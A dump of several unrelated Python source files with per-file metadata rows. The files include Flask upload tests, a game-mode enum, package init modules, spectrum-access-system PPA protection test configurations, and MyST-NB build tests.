        assert_that(response.status_code, equal_to(400))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    @patch('application.files.uploaded.UploadedFile.validate')
    @patch('performanceplatform.client.data_set.DataSet.post')
    def test_redirect_to_error_if_problems_and_prevent_post(
            self,
            data_set_post_patch,
            validate_patch,
            get_data_set_patch,
            client):
        """A failed file validation flashes errors and never hits Backdrop."""
        validate_patch.return_value = ["99"]
        get_data_set_patch.return_value = {
            'data_group': 'carers-allowance',
            'data_type': 'volumetrics',
            'bearer_token': 'abc123', 'foo': 'bar'
        }
        post_data = {
            'file':
                (StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
                 'MYSPECIALFILE.csv')
        }
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data=post_data)
        assert_that(
            self.get_from_session('upload_data')['payload'],
            equal_to(['99']))
        assert_that(response.headers['Location'], ends_with('/upload-data'))
        assert_that(response.status_code, equal_to(302))
        # No data must be sent downstream when validation fails.
        assert_that(data_set_post_patch.called, equal_to(False))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    @patch('application.files.uploaded.UploadedFile.validate')
    @patch('performanceplatform.client.data_set.DataSet.post')
    def test_redirect_to_error_if_problems_and_prevent_post_json(
            self,
            data_set_post_patch,
            validate_patch,
            get_data_set_patch,
            client):
        """JSON variant: a failed validation is a 400 and skips Backdrop."""
        validate_patch.return_value = ["99"]
        get_data_set_patch.return_value = {
            'data_group': 'carers-allowance',
            'data_type': 'volumetrics',
            'bearer_token': 'abc123', 'foo': 'bar'
        }
        post_data = {
            'file':
                (StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
                 'MYSPECIALFILE.csv')
        }
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data=post_data,
            headers={'Accept': 'application/json'},
        )
        assert_that(response.status_code, equal_to(400))
        assert_that(data_set_post_patch.called, equal_to(False))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.list_data_sets')
    def test_data_sets_redirects_to_sign_out_when_401_on_data_set_list(
            self,
            mock_data_set_list,
            client):
        """A 401 while listing data sets signs the user out."""
        bad_response = requests.Response()
        bad_response.status_code = 401
        http_error = requests.exceptions.HTTPError()
        http_error.response = bad_response
        mock_data_set_list.side_effect = http_error
        response = client.get("/upload-data")
        assert_that(response.status_code, equal_to(302))
        assert_that(
            response.headers['Location'],
            ends_with('/sign-out'))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.list_data_sets')
    def test_data_sets_renders_error_page_when_500_on_data_set_list(
            self,
            mock_data_set_list,
            client):
        """A 500 while listing data sets renders the error template."""
        http_error = requests.exceptions.HTTPError()
        # A Mock response is enough here: only status_code/content are read.
        bad_response = Mock()
        bad_response.status_code = 500
        bad_response.content = '{"message": "Test Error"}'
        http_error.response = bad_response
        mock_data_set_list.side_effect = http_error
        response = client.get("/upload-data")
        self.assert_template_used('error.html')

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.list_data_sets')
    def test_data_sets_renders_a_data_set_list_and_okay_message_on_success(
            self,
            mock_data_set_list,
            client):
        """The upload page lists all data sets and shows the flashed message."""
        mock_data_set_list.return_value = [
            {
                'data_group': "group_1",
                'data_type': "type1"
            },
            {
                'data_group': "group_1",
                'data_type': "type2"
            },
            {
                'data_group': "group_2",
                'data_type': "type3"
            }
        ]
        # Pre-populate the session as if an upload just succeeded.
        with self.client.session_transaction() as session:
            session['upload_data'] = {
                'data_group': 'group_1',
                'data_type': 'type1',
                'payload': ['Your data uploaded successfully'],
            }
        response = client.get("/upload-data")
        assert_that(
            response.data,
            contains_string("type1"))
        assert_that(
            response.data,
            contains_string("type2"))
        assert_that(
            response.data,
            contains_string("type3"))
        assert_that(
            response.data,
            contains_string(
                "Your data uploaded successfully"))
def backdrop_response(status_code, return_value):
    """Return a ``requests.HTTPError`` carrying a stubbed response.

    The attached response reports ``status_code`` and yields
    ``return_value`` from its ``.json()`` method.
    """
    error = requests.HTTPError()
    stub = requests.Response()
    stub.status_code = status_code
    stub.json = Mock(return_value=return_value)
    error.response = stub
    return error
| 34.820856 | 78 | 0.598556 | 1,394 | 13,023 | 5.237446 | 0.108321 | 0.056568 | 0.036981 | 0.051363 | 0.838926 | 0.823586 | 0.787837 | 0.771127 | 0.741542 | 0.741542 | 0 | 0.025167 | 0.289104 | 13,023 | 373 | 79 | 34.914209 | 0.763448 | 0 | 0 | 0.684685 | 0 | 0 | 0.259925 | 0.151117 | 0 | 0 | 0 | 0 | 0.09009 | 1 | 0.042042 | false | 0 | 0.015015 | 0 | 0.063063 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
82ab5dee3826ab67ea24709d2d2069fd3a6571c8 | 297 | py | Python | numerical_tic_tac_toe/game_mode.py | gbroques/numerical-tic-tac-toe | 143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8 | [
"MIT"
] | 1 | 2022-03-29T01:44:27.000Z | 2022-03-29T01:44:27.000Z | numerical_tic_tac_toe/game_mode.py | gbroques/numerical-tic-tac-toe | 143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8 | [
"MIT"
] | null | null | null | numerical_tic_tac_toe/game_mode.py | gbroques/numerical-tic-tac-toe | 143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8 | [
"MIT"
] | null | null | null | from enum import Enum, auto
class GameMode(Enum):
    """The two ways a game can be played: against a human or fully automated."""

    HUMAN_VS_COMPUTER = auto()
    COMPUTER_VS_COMPUTER = auto()

    def is_human_vs_computer(self):
        """Return True when a human plays against the computer."""
        return self == GameMode.HUMAN_VS_COMPUTER

    def is_computer_vs_computer(self):
        """Return True when the computer plays against itself."""
        return self == GameMode.COMPUTER_VS_COMPUTER
| 22.846154 | 52 | 0.734007 | 42 | 297 | 4.857143 | 0.309524 | 0.294118 | 0.220588 | 0.196078 | 0.333333 | 0.333333 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0.205387 | 297 | 12 | 53 | 24.75 | 0.864407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.25 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
82c15fcc29aeec0d0dd65aeebe69c59d3838271d | 277 | py | Python | interfax/__init__.py | ricky-shake-n-bake-bobby/interfax-python | 63c282672b6555f745d971988441af44b133468d | [
"MIT"
] | null | null | null | interfax/__init__.py | ricky-shake-n-bake-bobby/interfax-python | 63c282672b6555f745d971988441af44b133468d | [
"MIT"
] | null | null | null | interfax/__init__.py | ricky-shake-n-bake-bobby/interfax-python | 63c282672b6555f745d971988441af44b133468d | [
"MIT"
] | null | null | null | from .response import InboundFax, OutboundFax, ForwardingEmail, Document, Image
from .files import File
__version__ = '1.0.5'
from .client import InterFAX # NOQA
__all__ = ('InterFAX', 'InboundFax', 'OutboundFax', 'ForwardingEmail',
'Document', 'Image', 'File')
| 27.7 | 79 | 0.707581 | 29 | 277 | 6.482759 | 0.62069 | 0.223404 | 0.382979 | 0.468085 | 0.521277 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012931 | 0.162455 | 277 | 9 | 80 | 30.777778 | 0.797414 | 0.01444 | 0 | 0 | 0 | 0 | 0.243542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
82c684222bffe1ea811b0f167f955039fcb46e1a | 16,369 | py | Python | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | nirajankeybridge/Spectrum-Access-System | e4e157f3b8fc9f29cb6fbb283acc3a7cbb1212e1 | [
"Apache-2.0"
] | null | null | null | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | nirajankeybridge/Spectrum-Access-System | e4e157f3b8fc9f29cb6fbb283acc3a7cbb1212e1 | [
"Apache-2.0"
] | null | null | null | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | nirajankeybridge/Spectrum-Access-System | e4e157f3b8fc9f29cb6fbb283acc3a7cbb1212e1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sas
import sas_testcase
from sas_test_harness import SasTestHarnessServer, generateCbsdRecords, \
generatePpaRecords
from util import winnforum_testcase, configurable_testcase, writeConfig, \
loadConfig, getRandomLatLongInPolygon, makePpaAndPalRecordsConsistent, \
getFqdnLocalhost, getUnusedPort, getCertFilename
from testcases.WINNF_FT_S_MCP_testcase import McpXprCommonTestcase
class PpaProtectionTestcase(McpXprCommonTestcase):
  def setUp(self):
    """Connect to the SAS under test and reset it to a clean state."""
    self._sas, self._sas_admin = sas.GetTestingSas()
    self._sas_admin.Reset()
  def tearDown(self):
    """Shut down any SAS test harness servers started during the test."""
    self.ShutdownServers()
  def generate_PPR_1_default_config(self, filename):
    """Generates the WinnForum configuration for PPR.1 (Single SAS PPA
    Protection) and writes it to ``filename``.

    Builds one PPA/PAL pair and four CBSDs: two placed inside the PPA, one
    within 40 km of it, and one beyond 40 km, each with a grant overlapping
    the PAL frequency range (3550-3560 MHz). Three CBSDs register through
    two domain proxies; the fourth registers directly with its own client
    certificate.
    """
    # Load PPA record
    ppa_record = json.load(
        open(os.path.join('testcases', 'testdata', 'ppa_record_0.json')))
    pal_record = json.load(
        open(os.path.join('testcases', 'testdata', 'pal_record_0.json')))
    pal_low_frequency = 3550000000
    pal_high_frequency = 3560000000
    # Make the PAL's frequency/user info and the PPA's PAL reference agree.
    ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
        ppa_record,
        [pal_record],
        pal_low_frequency,
        pal_high_frequency,
        'test_user_1'
    )

    # Load devices info
    device_1 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_a.json')))
    # Moving device_1 to a location within 40 KMs of PPA zone
    device_1['installationParam']['latitude'] = 38.8203
    device_1['installationParam']['longitude'] = -97.2741

    device_2 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_b.json')))
    # Moving device_2 to a location outside 40 KMs of PPA zone
    device_2['installationParam']['latitude'] = 39.31476
    device_2['installationParam']['longitude'] = -96.75139

    device_3 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_c.json')))
    # Moving device_3 to a location within PPA zone
    device_3['installationParam']['latitude'], \
        device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)

    device_4 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_d.json')))
    # Moving device_4 to a location within PPA zone
    device_4['installationParam']['latitude'], \
        device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)

    # Load Grant requests; all overlap the PAL range 3550-3560 MHz.
    grant_request_1 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_0.json')))
    grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
    grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000

    grant_request_2 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_1.json')))
    grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
    grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000

    grant_request_3 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_2.json')))
    grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
    grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000

    grant_request_4 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_0.json')))
    grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
    grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000

    # device_b and device_d are Category B
    # Load Conditional Data
    self.assertEqual(device_2['cbsdCategory'], 'B')
    conditionals_device_2 = {
        'cbsdCategory': device_2['cbsdCategory'],
        'fccId': device_2['fccId'],
        'cbsdSerialNumber': device_2['cbsdSerialNumber'],
        'airInterface': device_2['airInterface'],
        'installationParam': device_2['installationParam'],
        'measCapability': device_2['measCapability']
    }
    self.assertEqual(device_4['cbsdCategory'], 'B')
    conditionals_device_4 = {
        'cbsdCategory': device_4['cbsdCategory'],
        'fccId': device_4['fccId'],
        'cbsdSerialNumber': device_4['cbsdSerialNumber'],
        'airInterface': device_4['airInterface'],
        'installationParam': device_4['installationParam'],
        'measCapability': device_4['measCapability']
    }

    # Remove conditionals from registration: Category B devices supply
    # these fields out of band rather than in the registration request.
    del device_2['cbsdCategory']
    del device_2['airInterface']
    del device_2['installationParam']
    del device_2['measCapability']
    del device_4['cbsdCategory']
    del device_4['airInterface']
    del device_4['installationParam']
    del device_4['measCapability']

    # Registration and grant records
    cbsd_records_domain_proxy_0 = {
        'registrationRequests': [device_1, device_2],
        'grantRequests': [grant_request_1, grant_request_2],
        'conditionalRegistrationData': [conditionals_device_2]
    }
    cbsd_records_domain_proxy_1 = {
        'registrationRequests': [device_3],
        'grantRequests': [grant_request_3],
        'conditionalRegistrationData': []
    }

    # Protected entity record
    protected_entities = {
        'palRecords': pal_records_1,
        'ppaRecords': [ppa_record_1]
    }

    iteration_config = {
        'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
                                          cbsd_records_domain_proxy_1],
        'cbsdRecords': [{
            'registrationRequest': device_4,
            'grantRequest': grant_request_4,
            'conditionalRegistrationData': conditionals_device_4,
            'clientCert': getCertFilename('device_d.cert'),
            'clientKey': getCertFilename('device_d.key')
        }],
        'protectedEntities': protected_entities,
        'dpaActivationList': [],
        'dpaDeactivationList': [],
        'sasTestHarnessData': []
    }

    # Create the actual config.
    config = {
        'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
        'initialCbsdRecords': [],
        'iterationData': [iteration_config],
        'sasTestHarnessConfigs': [],
        'domainProxyConfigs': [{
            'cert': getCertFilename('domain_proxy.cert'),
            'key': getCertFilename('domain_proxy.key')
        }, {
            'cert': getCertFilename('domain_proxy_1.cert'),
            'key': getCertFilename('domain_proxy_1.key')
        }]
    }
    writeConfig(filename, config)
@configurable_testcase(generate_PPR_1_default_config)
def test_WINNF_FT_S_PPR_1(self, config_filename):
"""Single SAS PPA Protection
"""
config = loadConfig(config_filename)
# Invoke MCP test steps 1 through 22.
self.executeMcpTestSteps(config, 'xPR1')
def generate_PPR_2_default_config(self, filename):
    """ Generates the WinnForum configuration for PPR.2.

    Builds registration/grant requests for four CBSDs, a consistent
    PPA/PAL protected-entity pair, and two SAS test-harness dumps, then
    writes the whole iteration config to *filename*.
    """
    # Load PPA record
    ppa_record = json.load(
        open(os.path.join('testcases', 'testdata', 'ppa_record_0.json')))
    pal_record = json.load(
        open(os.path.join('testcases', 'testdata', 'pal_record_0.json')))
    # PAL channel (3550-3560 MHz) used to make the PPA/PAL records consistent.
    pal_low_frequency = 3550000000
    pal_high_frequency = 3560000000
    ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
        ppa_record,
        [pal_record],
        pal_low_frequency,
        pal_high_frequency,
        'test_user_1'
    )
    # Load devices info
    device_1 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_a.json')))
    # Moving device_1 to a location within 40 KMs of PPA zone
    device_1['installationParam']['latitude'] = 38.8203
    device_1['installationParam']['longitude'] = -97.2741
    device_2 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_b.json')))
    # Moving device_2 to a location outside 40 KMs of PPA zone
    device_2['installationParam']['latitude'] = 39.31476
    device_2['installationParam']['longitude'] = -96.75139
    device_3 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_c.json')))
    # Moving device_3 to a location within PPA zone
    device_3['installationParam']['latitude'], \
        device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
    device_4 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_d.json')))
    # Moving device_4 to a location within PPA zone
    device_4['installationParam']['latitude'], \
        device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
    # Load Grant requests with overlapping frequency range for all devices
    grant_request_1 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_0.json')))
    grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
    grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
    grant_request_2 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_1.json')))
    grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3570000000
    grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3580000000
    grant_request_3 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_2.json')))
    grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3590000000
    grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3600000000
    grant_request_4 = json.load(
        open(os.path.join('testcases', 'testdata', 'grant_0.json')))
    grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3610000000
    grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3620000000
    # device_b and device_d are Category B
    # Load Conditional Data
    self.assertEqual(device_2['cbsdCategory'], 'B')
    conditionals_device_2 = {
        'cbsdCategory': device_2['cbsdCategory'],
        'fccId': device_2['fccId'],
        'cbsdSerialNumber': device_2['cbsdSerialNumber'],
        'airInterface': device_2['airInterface'],
        'installationParam': device_2['installationParam'],
        'measCapability': device_2['measCapability']
    }
    self.assertEqual(device_4['cbsdCategory'], 'B')
    conditionals_device_4 = {
        'cbsdCategory': device_4['cbsdCategory'],
        'fccId': device_4['fccId'],
        'cbsdSerialNumber': device_4['cbsdSerialNumber'],
        'airInterface': device_4['airInterface'],
        'installationParam': device_4['installationParam'],
        'measCapability': device_4['measCapability']
    }
    # Remove conditionals from registration
    del device_2['cbsdCategory']
    del device_2['airInterface']
    del device_2['installationParam']
    del device_2['measCapability']
    del device_4['cbsdCategory']
    del device_4['airInterface']
    del device_4['installationParam']
    del device_4['measCapability']
    # Registration and grant records
    cbsd_records_domain_proxy_0 = {
        'registrationRequests': [device_1, device_2],
        'grantRequests': [grant_request_1, grant_request_2],
        'conditionalRegistrationData': [conditionals_device_2]
    }
    cbsd_records_domain_proxy_1 = {
        'registrationRequests': [device_3],
        'grantRequests': [grant_request_3],
        'conditionalRegistrationData': []
    }
    # Protected entity record
    protected_entities = {
        'palRecords': pal_records_1,
        'ppaRecords': [ppa_record_1]
    }
    # SAS Test Harnesses configurations,
    # Following configurations are for two SAS test harnesses
    sas_test_harness_device_1 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_a.json')))
    sas_test_harness_device_1['fccId'] = "test_fcc_id_e"
    sas_test_harness_device_1['userId'] = "test_user_id_e"
    sas_test_harness_device_2 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_b.json')))
    sas_test_harness_device_2['fccId'] = "test_fcc_id_f"
    sas_test_harness_device_2['userId'] = "test_user_id_f"
    sas_test_harness_device_3 = json.load(
        open(os.path.join('testcases', 'testdata', 'device_c.json')))
    sas_test_harness_device_3['fccId'] = "test_fcc_id_g"
    sas_test_harness_device_3['userId'] = "test_user_id_g"
    # Generate Cbsd FAD Records for SAS Test Harness 0
    cbsd_fad_records_sas_test_harness_0 = generateCbsdRecords(
        [sas_test_harness_device_1],
        [[grant_request_1]]
    )
    # Generate Cbsd FAD Records for SAS Test Harness 1
    cbsd_fad_records_sas_test_harness_1 = generateCbsdRecords(
        [sas_test_harness_device_2, sas_test_harness_device_3],
        [[grant_request_2], [grant_request_3]]
    )
    # Generate SAS Test Harnesses dump records
    dump_records_sas_test_harness_0 = {
        'cbsdRecords': cbsd_fad_records_sas_test_harness_0
    }
    dump_records_sas_test_harness_1 = {
        'cbsdRecords': cbsd_fad_records_sas_test_harness_1
    }
    # SAS Test Harnesses configuration
    sas_test_harness_0_config = {
        'sasTestHarnessName': 'SAS-TH-1',
        'hostName': getFqdnLocalhost(),
        'port': getUnusedPort(),
        'serverCert': getCertFilename('sas.cert'),
        'serverKey': getCertFilename('sas.key'),
        'caCert': getCertFilename('ca.cert')
    }
    sas_test_harness_1_config = {
        'sasTestHarnessName': 'SAS-TH-2',
        'hostName': getFqdnLocalhost(),
        'port': getUnusedPort(),
        'serverCert': getCertFilename('sas_1.cert'),
        'serverKey': getCertFilename('sas_1.key'),
        'caCert': getCertFilename('ca.cert')
    }
    iteration_config = {
        'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
                                          cbsd_records_domain_proxy_1],
        'cbsdRecords': [{
            'registrationRequest': device_4,
            'grantRequest': grant_request_4,
            'conditionalRegistrationData': conditionals_device_4,
            'clientCert': getCertFilename('device_d.cert'),
            'clientKey': getCertFilename('device_d.key')
        }],
        'protectedEntities': protected_entities,
        'dpaActivationList': [],
        'dpaDeactivationList': [],
        'sasTestHarnessData': [dump_records_sas_test_harness_0,
                               dump_records_sas_test_harness_1]
    }
    # Create the actual config.
    config = {
        'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
        'initialCbsdRecords': [],
        'iterationData': [iteration_config],
        'sasTestHarnessConfigs': [sas_test_harness_0_config,
                                  sas_test_harness_1_config],
        'domainProxyConfigs': [{
            'cert': getCertFilename('domain_proxy.cert'),
            'key': getCertFilename('domain_proxy.key')
        }, {
            'cert': getCertFilename('domain_proxy_1.cert'),
            'key': getCertFilename('domain_proxy_1.key')}
        ]
    }
    writeConfig(filename, config)
@configurable_testcase(generate_PPR_2_default_config)
def test_WINNF_FT_S_PPR_2(self, config_filename):
    """Multiple SAS PPA Protection
    """
    # Load the configuration and run the shared MCP machinery,
    # steps 1 through 22, in PPR.2 mode.
    ppr2_config = loadConfig(config_filename)
    self.executeMcpTestSteps(ppr2_config, 'xPR2')
| 40.517327 | 97 | 0.667664 | 1,683 | 16,369 | 6.206774 | 0.144385 | 0.026805 | 0.036186 | 0.030825 | 0.85449 | 0.818974 | 0.767471 | 0.743155 | 0.729753 | 0.729753 | 0 | 0.037493 | 0.216262 | 16,369 | 403 | 98 | 40.617866 | 0.776756 | 0.124076 | 0 | 0.681208 | 0 | 0 | 0.294645 | 0.049201 | 0 | 0 | 0 | 0 | 0.013423 | 1 | 0.020134 | false | 0 | 0.02349 | 0 | 0.04698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
82d8970ccb0024465e233c44969887e186280d4a | 147 | py | Python | docs/source/topics/processes/include/snippets/functions/signature_plain_python_args_kwargs.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 180 | 2019-07-12T07:45:26.000Z | 2022-03-22T13:16:57.000Z | docs/source/topics/processes/include/snippets/functions/signature_plain_python_args_kwargs.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 2,466 | 2016-12-24T01:03:52.000Z | 2019-07-04T13:41:08.000Z | docs/source/topics/processes/include/snippets/functions/signature_plain_python_args_kwargs.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 88 | 2016-12-23T16:28:00.000Z | 2019-07-01T15:55:20.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def add(*args, **kwargs):
    """Return the sum of every positional and keyword argument value."""
    total = sum(args)
    return total + sum(kwargs.values())


add(4, 5, z=6)  # Returns 15
| 18.375 | 43 | 0.578231 | 24 | 147 | 3.541667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.183673 | 147 | 7 | 44 | 21 | 0.658333 | 0.360544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
7d7ed0ff97e0b51c25246f940ee70da0ae032d30 | 171 | py | Python | libs/cidre/cidre/__init__.py | YuzhongHuangCS/journal-citation-cartels | 7b82d9e081555f5b40eb6cc6f44f65ce1c3c1a0f | [
"BSD-2-Clause"
] | 2 | 2020-09-22T09:59:56.000Z | 2022-01-31T20:00:49.000Z | libs/cidre/cidre/__init__.py | YuzhongHuangCS/journal-citation-cartels | 7b82d9e081555f5b40eb6cc6f44f65ce1c3c1a0f | [
"BSD-2-Clause"
] | 1 | 2021-07-20T20:01:46.000Z | 2021-07-20T21:21:03.000Z | libs/cidre/cidre/__init__.py | YuzhongHuangCS/journal-citation-cartels | 7b82d9e081555f5b40eb6cc6f44f65ce1c3c1a0f | [
"BSD-2-Clause"
] | 3 | 2021-03-09T04:38:56.000Z | 2021-07-13T04:49:15.000Z | """
CIDRE algorithm
"""
from cidre import utils
from cidre import filters
from cidre import draw
from cidre import cidre
__all__ = ["utils", "filters", "draw", "cidre"]
| 17.1 | 47 | 0.719298 | 23 | 171 | 5.173913 | 0.347826 | 0.302521 | 0.504202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163743 | 171 | 9 | 48 | 19 | 0.832168 | 0.087719 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7dc203b51f80ac344c66e327ed3aed01a2af2b96 | 2,469 | py | Python | tests/test_mystnb_features.py | krassowski/MyST-NB | f44aa273af91a16a06be3ccc4612d9bcd2390135 | [
"BSD-3-Clause"
] | null | null | null | tests/test_mystnb_features.py | krassowski/MyST-NB | f44aa273af91a16a06be3ccc4612d9bcd2390135 | [
"BSD-3-Clause"
] | null | null | null | tests/test_mystnb_features.py | krassowski/MyST-NB | f44aa273af91a16a06be3ccc4612d9bcd2390135 | [
"BSD-3-Clause"
] | null | null | null | import pytest
from sphinx.util.fileutil import copy_asset_file
@pytest.mark.sphinx_params(
    "mystnb_codecell_file.md",
    conf={"jupyter_execute_notebooks": "cache", "source_suffix": {".md": "myst-nb"}},
)
def test_codecell_file(sphinx_run, file_regression, check_nbs, get_test_path):
    """Build a document whose code-cell content is loaded from a .py file."""
    # Copy the referenced python source next to the document, then build.
    asset = get_test_path("mystnb_codecell_file.py")
    copy_asset_file(str(asset), str(sphinx_run.app.srcdir))
    sphinx_run.build()
    assert sphinx_run.warnings() == ""

    metadata = sphinx_run.app.env.metadata["mystnb_codecell_file"]
    assert set(metadata.keys()) == {
        "jupytext",
        "kernelspec",
        "author",
        "source_map",
        "language_info",
    }
    assert metadata["author"] == "Matt"
    assert metadata["kernelspec"] == (
        '{"display_name": "Python 3", "language": "python", "name": "python3"}'
    )

    # Regression-check both the produced notebook and the doctree.
    file_regression.check(
        sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb", encoding="utf8"
    )
    file_regression.check(
        sphinx_run.get_doctree().pformat(), extension=".xml", encoding="utf8"
    )
@pytest.mark.sphinx_params(
    "mystnb_codecell_file_warnings.md",
    conf={"jupyter_execute_notebooks": "force", "source_suffix": {".md": "myst-nb"}},
)
def test_codecell_file_warnings(sphinx_run, file_regression, check_nbs, get_test_path):
    """The :load: option must warn when it overwrites existing cell content."""
    asset = get_test_path("mystnb_codecell_file.py")
    copy_asset_file(str(asset), str(sphinx_run.app.srcdir))
    sphinx_run.build()

    expected_warning = (
        "mystnb_codecell_file_warnings.md:14 content of code-cell "
        "is being overwritten by :load: mystnb_codecell_file.py"
    )
    assert expected_warning in sphinx_run.warnings()

    metadata = sphinx_run.app.env.metadata["mystnb_codecell_file_warnings"]
    assert set(metadata.keys()) == {
        "jupytext",
        "kernelspec",
        "author",
        "source_map",
        "language_info",
    }
